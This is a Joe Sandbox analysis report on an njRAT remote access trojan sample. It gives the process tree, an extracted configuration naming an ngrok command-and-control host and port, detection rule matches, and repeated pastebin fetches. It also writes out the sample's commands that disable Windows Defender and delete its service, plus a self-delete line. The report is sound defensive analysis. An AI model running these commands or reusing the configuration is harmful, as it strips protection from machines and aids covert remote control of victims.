Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
G1lnGpOLK4.exe

Overview

General Information

Sample name:G1lnGpOLK4.exe
renamed because original name is a hash value
Original sample name:97d72efbb1f6fea3f158b136c330689d.exe
Analysis ID:1435109
MD5:97d72efbb1f6fea3f158b136c330689d
SHA1:43c884250ed032ced44d72d932518e831a34161d
SHA256:2ff91319fbcc02e9dd7d80e21f5f7f48e0ae24b99a1b26625d344ab4812f37c4
Tags:32exe
Infos:

Detection

Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to log keystrokes (.Net Source)
Disables Windows Defender (via service or powershell)
Disables zone checking for all users
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
  • G1lnGpOLK4.exe (PID: 2472 cmdline: "C:\Users\user\Desktop\G1lnGpOLK4.exe" MD5: 97D72EFBB1F6FEA3F158B136C330689D)
    • cmd.exe (PID: 7904 cmdline: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7976 cmdline: powershell Set-MpPreference -DisableRealtimeMonitoring $true MD5: 04029E121A0CFA5991749937DD22A1D9)
        • WmiPrvSE.exe (PID: 5700 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 8176 cmdline: cmd /c sc query windefend MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 7796 cmdline: sc query windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 8004 cmdline: cmd /c sc stop windefend MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 8132 cmdline: sc stop windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1364 cmdline: cmd /c sc delete windefend MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5788 cmdline: sc delete windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • chrome.exe (PID: 3652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat
{"Host": "0.tcp.eu.ngrok.io", "Port": "18350", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "f2d4732908d59805d830a49d36974ac0", "Campaign ID": "Victim", "Network Seprator": "Y262SUCZ4UJJ"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
    00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
    • 0xab28:$a1: get_Registry
    • 0xdbab:$a2: SEE_MASK_NOZONECHECKS
    • 0xc93e:$a3: Download ERROR
    • 0xdee7:$a4: cmd.exe /c ping 0 -n 2 & del "
    00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
    • 0xdbab:$a2: SEE_MASK_NOZONECHECKS
    • 0xdf6f:$b1: [TAP]
    • 0xdee7:$c3: cmd.exe /c ping
    00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
    • 0xdbab:$reg: SEE_MASK_NOZONECHECKS
    • 0xc91a:$msg: Execute ERROR
    • 0xc97e:$msg: Execute ERROR
    • 0xdee7:$ping: cmd.exe /c ping 0 -n 2 & del
    00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
      Click to see the 10 entries
      SourceRuleDescriptionAuthorStrings
      0.2.G1lnGpOLK4.exe.1390000.1.raw.unpackJoeSecurity_NjratYara detected NjratJoe Security
        0.2.G1lnGpOLK4.exe.1390000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          0.2.G1lnGpOLK4.exe.1390000.1.raw.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
          • 0x93b8:$a1: get_Registry
          • 0xc43b:$a2: SEE_MASK_NOZONECHECKS
          • 0xb1ce:$a3: Download ERROR
          • 0xc777:$a4: cmd.exe /c ping 0 -n 2 & del "
          0.2.G1lnGpOLK4.exe.1390000.1.raw.unpackRevengeRAT_Sep17Detects RevengeRAT malwareFlorian Roth
          • 0xa555:$x3: 03C7F4E8FB359AEC0EEF0814B66A704FC43FB3A8
          0.2.G1lnGpOLK4.exe.1390000.1.raw.unpackAndromeda_MalBot_Jun_1ADetects a malicious Worm Andromeda / RETADUPFlorian Roth
          • 0xccad:$s1: 4System.Web.Services.Protocols.SoapHttpClientProtocol
          • 0xac18:$s2: svhost.exe
          Click to see the 14 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\G1lnGpOLK4.exe", ParentImage: C:\Users\user\Desktop\G1lnGpOLK4.exe, ParentProcessId: 2472, ParentProcessName: G1lnGpOLK4.exe, ProcessCommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, ProcessId: 7904, ProcessName: cmd.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\G1lnGpOLK4.exe", ParentImage: C:\Users\user\Desktop\G1lnGpOLK4.exe, ParentProcessId: 2472, ParentProcessName: G1lnGpOLK4.exe, ProcessCommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, ProcessId: 7904, ProcessName: cmd.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine: powershell Set-MpPreference -DisableRealtimeMonitoring $true, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7904, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableRealtimeMonitoring $true, ProcessId: 7976, ProcessName: powershell.exe
          Source: Process startedAuthor: frack113: Data: Command: sc query windefend, CommandLine: sc query windefend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c sc query windefend, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8176, ParentProcessName: cmd.exe, ProcessCommandLine: sc query windefend, ProcessId: 7796, ProcessName: sc.exe
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: G1lnGpOLK4.exeAvira: detected
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpackMalware Configuration Extractor: Njrat {"Host": "0.tcp.eu.ngrok.io", "Port": "18350", "Version": "<- NjRAT 0.7d Horror Edition ->", "Registry Name": "f2d4732908d59805d830a49d36974ac0", "Campaign ID": "Victim", "Network Seprator": "Y262SUCZ4UJJ"}
          Source: 0.tcp.eu.ngrok.ioVirustotal: Detection: 16%Perma Link
          Source: 0.tcp.eu.ngrok.ioVirustotal: Detection: 16%Perma Link
          Source: G1lnGpOLK4.exeReversingLabs: Detection: 68%
          Source: G1lnGpOLK4.exeVirustotal: Detection: 70%Perma Link
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR
          Source: G1lnGpOLK4.exeJoe Sandbox ML: detected
          Source: G1lnGpOLK4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49745 version: TLS 1.0
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dllJump to behavior
          Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49767 version: TLS 1.2
          Source: G1lnGpOLK4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

          barindex
          Source: Malware configuration extractorURLs: 0.tcp.eu.ngrok.io
          Source: unknownDNS query: name: pastebin.com
          Source: Yara matchFile source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 18.192.31.165:15155
          Source: global trafficTCP traffic: 192.168.2.4:49777 -> 3.124.142.205:15155
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: Joe Sandbox ViewIP Address: 3.124.142.205 3.124.142.205
          Source: Joe Sandbox ViewIP Address: 18.192.31.165 18.192.31.165
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49745 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 104.118.8.139
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
          Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
          Source: global trafficHTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
